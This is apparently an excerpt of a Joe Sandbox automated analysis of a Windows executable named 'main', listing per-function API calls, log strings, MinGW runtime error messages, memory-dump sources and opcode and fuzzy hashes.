                                                                                                                                                  • Instruction ID: 76d582da3ff774e70535047c05890818ec9daa5c6ae435b43f0279a61cc2a6a2
                                                                                                                                                  • Opcode Fuzzy Hash: ded80575854a2ac1c31e98b4d13eabe6bc3d5566ee1ac97b299903925feaac68
                                                                                                                                                  • Instruction Fuzzy Hash: 8C519F51F0958751FA358B1DA910FBA16727F39788F584232FB4E8BAD5DE2CE921C340
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,?,?,00007FF6BE0450F8,00007FF6BE045100,00007FF6BE030000,?,?,00007FF6BE03A348,?,?,00007FF6BE0484F8,00000000), ref: 00007FF6BE03A1DD
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?,00007FF6BE0450F8,00007FF6BE045100,00007FF6BE030000,?,?,00007FF6BE03A348,?,?,00007FF6BE0484F8,00000000), ref: 00007FF6BE03A244
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00007FF6BE0450F8,00007FF6BE045100,00007FF6BE030000,?,?,00007FF6BE03A348,?,?,00007FF6BE0484F8,00000000), ref: 00007FF6BE03A24E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$ErrorLastProtectQuery
                                                                                                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                                                                  • API String ID: 637304234-2123141913
                                                                                                                                                  • Opcode ID: 6903964d322ee31ad0e95d65d8f33e82ba9bc0ba0f8e816a8c1169f1d38d6b35
                                                                                                                                                  • Instruction ID: 1476ee8b4eab349caf1721fcbd812c2a8b259ba217c014941c57ca1fc2bae78c
                                                                                                                                                  • Opcode Fuzzy Hash: 6903964d322ee31ad0e95d65d8f33e82ba9bc0ba0f8e816a8c1169f1d38d6b35
                                                                                                                                                  • Instruction Fuzzy Hash: 3331A071B09A4285EA248F5DE940A696371FFB9B84F448936FF0D873A8DE3CE565D300
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00007FF6BE031694: LoadLibraryA.KERNEL32(?,?,service,000002234F5413D0,00007FF6BE039404), ref: 00007FF6BE0316A2
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF6BE031818
                                                                                                                                                    • Part of subcall function 00007FF6BE031613: GetProcAddress.KERNEL32(?,?,00000000,000002234F5413D0,?,00007FF6BE03941F), ref: 00007FF6BE031633
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastLibraryLoadProc
                                                                                                                                                  • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                                                                                                                                                  • API String ID: 3511525774-1584720945
                                                                                                                                                  • Opcode ID: 299e703167dabb65f95b7969ec2bd929e0b5c348b50a9a34504bfdabb7e3df02
                                                                                                                                                  • Instruction ID: 98650692215f2e0971ea7b8459355375e315cfaa7c2066d1ffe2849933591527
                                                                                                                                                  • Opcode Fuzzy Hash: 299e703167dabb65f95b7969ec2bd929e0b5c348b50a9a34504bfdabb7e3df02
                                                                                                                                                  • Instruction Fuzzy Hash: 48115B61E1D60392FB319B5CE9507B42270AF7C384F840433FA0EDA2A1EE2CE965C301
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00007FF6BE031694: LoadLibraryA.KERNEL32(?,?,service,000002234F5413D0,00007FF6BE039404), ref: 00007FF6BE0316A2
                                                                                                                                                    • Part of subcall function 00007FF6BE031613: GetProcAddress.KERNEL32(?,?,00000000,000002234F5413D0,?,00007FF6BE03941F), ref: 00007FF6BE031633
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF6BE031760
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                                                                                                                                                  • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                                                                                                                                                  • API String ID: 1533789296-1853374401
                                                                                                                                                  • Opcode ID: 09afca86ac6373594683831a9800fda29b0d0380933a6dba12c5dd9e95751942
                                                                                                                                                  • Instruction ID: 26f2c50d11ab47e80197e7d57ea837a1d550ca20fd1a66e32a0a7b6cb9b974f8
                                                                                                                                                  • Opcode Fuzzy Hash: 09afca86ac6373594683831a9800fda29b0d0380933a6dba12c5dd9e95751942
                                                                                                                                                  • Instruction Fuzzy Hash: 69011E60E1D90392FB20A71CE9917B426756F7C385F940433F60EC62A1EF2CE565D301
                                                                                                                                                  APIs
                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,000002234F5413D0,00007FF6BE038CDE,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8), ref: 00007FF6BE03892F
                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00000000,000002234F5413D0,00007FF6BE038CDE,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8), ref: 00007FF6BE038962
                                                                                                                                                  • HeapFree.KERNEL32(?,?,00000000,000002234F5413D0,00007FF6BE038CDE,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8), ref: 00007FF6BE038973
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap$LibraryProcessfflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(name=%s)$units_cleanup
                                                                                                                                                  • API String ID: 1108967834-2645831314
                                                                                                                                                  • Opcode ID: df822bde4ab91df9b5e11f67eb84a15336e41f6d56ae208c14dde87552ffa11d
                                                                                                                                                  • Instruction ID: be1d927be9eef80314fe3a573a9176bd422fadb0021d29ce6381ee4af2303a01
                                                                                                                                                  • Opcode Fuzzy Hash: df822bde4ab91df9b5e11f67eb84a15336e41f6d56ae208c14dde87552ffa11d
                                                                                                                                                  • Instruction Fuzzy Hash: F1112C61A0D60781FA609F5DE944B7823B1BF7CB44F484472EB4D873A0EE2CE865D321
                                                                                                                                                  APIs
                                                                                                                                                  • fclose.MSVCRT ref: 00007FF6BE039E53
                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,00007FF6BE0389B9,?,?,00000000,00007FF6BE038CE3,?,?,?,?,?,?,00000001), ref: 00007FF6BE039E80
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalDeleteSectionfclose
                                                                                                                                                  • String ID: Done$[I] (%s) -> %s$debug_cleanup
                                                                                                                                                  • API String ID: 3387974148-4247581856
                                                                                                                                                  • Opcode ID: 0b41fed68d09f55e26358beb6b558423a32279b24a0a215fce4a601fd74a5666
                                                                                                                                                  • Instruction ID: 557f8ba41ec1e1f7b1133acbe8c242bab9918f67f4a884283f5315e410539fc5
                                                                                                                                                  • Opcode Fuzzy Hash: 0b41fed68d09f55e26358beb6b558423a32279b24a0a215fce4a601fd74a5666
                                                                                                                                                  • Instruction Fuzzy Hash: 43F0F4A4A0D64B80FA10AB6CEA653752270EFB4754F840937F30C86164CF3CA0699360
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00007FF6BE0484F8,00000000,?,?,?,00007FF6BE0484F0,00007FF6BE031208,?,?,?,00007FF6BE031313), ref: 00007FF6BE03A4C7
                                                                                                                                                  Strings
                                                                                                                                                  • Unknown pseudo relocation bit size %d., xrefs: 00007FF6BE03A3F0
                                                                                                                                                  • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF6BE03A462
                                                                                                                                                  • Unknown pseudo relocation protocol version %d., xrefs: 00007FF6BE03A36D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                                                  • API String ID: 544645111-1286557213
                                                                                                                                                  • Opcode ID: f376e8e6a081a73d79aaf6fb7616c898084fe598007c7d48d63f28f0360e0926
                                                                                                                                                  • Instruction ID: 1086768f3d51cee392c1a680e5803c1751e67bd7ae73cbd8f35722d347614459
                                                                                                                                                  • Opcode Fuzzy Hash: f376e8e6a081a73d79aaf6fb7616c898084fe598007c7d48d63f28f0360e0926
                                                                                                                                                  • Instruction Fuzzy Hash: AE51AD61F0865295EB308B1DD544A78A3B1EBB8BA4F048536FB1D837D9DE3CE5A1E700
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorHandleLastModule
                                                                                                                                                  • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                                                                                                                                                  • API String ID: 4242514867-2427012484
                                                                                                                                                  • Opcode ID: a70a8af8a6799b811748485c2465aaf2f97ed70b4a56fe3518cf35e5e755f2da
                                                                                                                                                  • Instruction ID: bee28b518a13a14ef3a7a5e07ca25bd8c30db4eb314379a70d0eaf7fc0b24ae1
                                                                                                                                                  • Opcode Fuzzy Hash: a70a8af8a6799b811748485c2465aaf2f97ed70b4a56fe3518cf35e5e755f2da
                                                                                                                                                  • Instruction Fuzzy Hash: 03F03920A0CA0680E7309B18E8447AA7771FFBC388F840033F74D86AA4EF6CD228C741
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Byte$CharMultiWide$Lead_errno
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2766522060-0
                                                                                                                                                  • Opcode ID: e52bfd8392137d51bb9391ae47cf714bbbdc63591f019e6cdc8d20eb038805a4
                                                                                                                                                  • Instruction ID: 74eb331e70a6b2fbbaedfbe19d2c1e0307a7945d1606c5d193d3480fb91bd8b2
                                                                                                                                                  • Opcode Fuzzy Hash: e52bfd8392137d51bb9391ae47cf714bbbdc63591f019e6cdc8d20eb038805a4
                                                                                                                                                  • Instruction Fuzzy Hash: 9531A472A0C38249F7304B299904B796BA0EBB9784F144235FB99877D6DF3CD5568702
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: signal
                                                                                                                                                  • String ID: CCG
                                                                                                                                                  • API String ID: 1946981877-1584390748
                                                                                                                                                  • Opcode ID: 3d48847964a56b40779e632f9fb4250c1fb945e224c615d2d4335e1e0d083621
                                                                                                                                                  • Instruction ID: 64c715b4b66b3dd9f36855e434f09a912d30ed6cc7bd25adc640f73c975be9e2
                                                                                                                                                  • Opcode Fuzzy Hash: 3d48847964a56b40779e632f9fb4250c1fb945e224c615d2d4335e1e0d083621
                                                                                                                                                  • Instruction Fuzzy Hash: 5A217C61E0D10385FE79521D9440B7921A2AF7E364F298B36FB0EC62D1DE5DE8F27211
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-3474627141
                                                                                                                                                  • Opcode ID: 6939521f6767264a8fb87927fdf9a759c58c7e4e71ae3242473c69dd497d05cf
                                                                                                                                                  • Instruction ID: 5ba6dea4dc98f427f613d8366246f795e5c58ec16172a3f17284cfa1b6243e12
                                                                                                                                                  • Opcode Fuzzy Hash: 6939521f6767264a8fb87927fdf9a759c58c7e4e71ae3242473c69dd497d05cf
                                                                                                                                                  • Instruction Fuzzy Hash: 4D113366908E8482D6118F1CE4413EAB370FFAE75AF505326FBCC66664DF39D166CB00
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-4283191376
                                                                                                                                                  • Opcode ID: 6742954880af872446bfc91b95b988c250abc5737df9b1f930ba577b45b3f3e3
                                                                                                                                                  • Instruction ID: 8b48626d4541736c6eacc897ae519eb1a074befea7067a4f15d6abe3877f7584
                                                                                                                                                  • Opcode Fuzzy Hash: 6742954880af872446bfc91b95b988c250abc5737df9b1f930ba577b45b3f3e3
                                                                                                                                                  • Instruction Fuzzy Hash: B0F01D66808F8482D2118F1CE4406ABB370FFAE789F605326FBCD66564DF2DD5528B00
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-4273532761
                                                                                                                                                  • Opcode ID: 854f2dfc0a9e7c149260f6d1f09afe283b3e576efdae8473c3133785e71ceb38
                                                                                                                                                  • Instruction ID: a530dffc0e99b9a3d2515387c90d204ac83248cf7193831f8a515e4c46fa709d
                                                                                                                                                  • Opcode Fuzzy Hash: 854f2dfc0a9e7c149260f6d1f09afe283b3e576efdae8473c3133785e71ceb38
                                                                                                                                                  • Instruction Fuzzy Hash: 5DF01D66808F8482D2118F1CE4406ABB370FFAE789F605326FBCD66564DF2DD5528B00
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-2713391170
                                                                                                                                                  • Opcode ID: efa7ca9327b7f50ec550392f9c9add8736aa4d523d0fd9fc290744eecbb183ed
                                                                                                                                                  • Instruction ID: 0597aaca5fb97fdad8c74fc0876f649a1fb6f6986b42ac38f2d32e91422960b9
                                                                                                                                                  • Opcode Fuzzy Hash: efa7ca9327b7f50ec550392f9c9add8736aa4d523d0fd9fc290744eecbb183ed
                                                                                                                                                  • Instruction Fuzzy Hash: DFF01D66808F8482D2118F1CE4406AFB370FFAE789F605326FBCD66564DF2DD5528B00
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-4064033741
                                                                                                                                                  • Opcode ID: d67f6cb67d9aa1b683b19a67aea6ff021f067e3de8b3c453dfdd5ccf3ac71a10
                                                                                                                                                  • Instruction ID: 6066593df446d9ec16d251cdff0a44480760945810cc7d8dd5fe860a61aa9435
                                                                                                                                                  • Opcode Fuzzy Hash: d67f6cb67d9aa1b683b19a67aea6ff021f067e3de8b3c453dfdd5ccf3ac71a10
                                                                                                                                                  • Instruction Fuzzy Hash: A4F01D66808F8482D2118F1CE4406ABB370FFAE789F605326FBCD66564DF2DD5568B00
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-2187435201
                                                                                                                                                  • Opcode ID: 29f5a33fe2bfd9c73ec78c153296316038a8ef3e282bb18084eb0fbbc30a309e
                                                                                                                                                  • Instruction ID: daf526e61c33b34a8a82dc5335a68ad8ace4888e320d63a8e2da0d1b7c3e168c
                                                                                                                                                  • Opcode Fuzzy Hash: 29f5a33fe2bfd9c73ec78c153296316038a8ef3e282bb18084eb0fbbc30a309e
                                                                                                                                                  • Instruction Fuzzy Hash: 09F01D66808F8482D2118F1CE4406ABB370FFAE789F605326FBCD66564DF3DD5528B00
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-2468659920
                                                                                                                                                  • Opcode ID: 7b5741c81ed116a003f85b52f29fe4854fc43aa525cf99e73fbc959c4dfbf3ab
                                                                                                                                                  • Instruction ID: 089504831369cae6c97437d9ead776d40d84793df9511f7857693afacf168478
                                                                                                                                                  • Opcode Fuzzy Hash: 7b5741c81ed116a003f85b52f29fe4854fc43aa525cf99e73fbc959c4dfbf3ab
                                                                                                                                                  • Instruction Fuzzy Hash: 1BF0CD66808F8486D2118F1CE4406ABB371FFAE789F605326FBC966664DF29D5568B00
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
